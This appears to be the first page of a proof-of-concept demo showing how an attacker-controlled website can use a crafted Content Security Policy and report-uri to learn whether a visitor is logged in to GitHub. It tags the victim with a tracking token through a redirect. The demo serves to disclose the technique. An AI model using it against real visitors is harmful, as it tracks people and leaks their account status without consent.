CSP data exfiltration

Goal

The goal of this attack POC is to exfiltrate information about a user, using an attacker-controled website with a crafted Content Security Policy.
This results in disclosing if a targeted user (victim) is logged in on GitHub

Prerequistes

• Attacker owns a website
• Victims visits the website (intentionnaly, or thought iframe)
• Victim's browser supports CSP and report-uri directive (any up-to-date browser, except IE11 obviously)

Step 1

You are the victim (no worry: your privacy won't be breached).
You are currently visiting the attacker website (this server is under attacker's control).
This page is the 1st step of the attack. It will redirect the victim to a 2nd step, adding a token (say, IP) to the URL. This way, attacker can track the user it targets.
Please click the link below, tho a real attack would use an HTTP-header redirection (Location).

step-2.php?ip=d8b0be175a360e259b5d84080c778730

Note: The token added in this example is a random md5. In practical attack, it could be victim's IP, a session token on attacker's website, or whatever.

Check the other showcases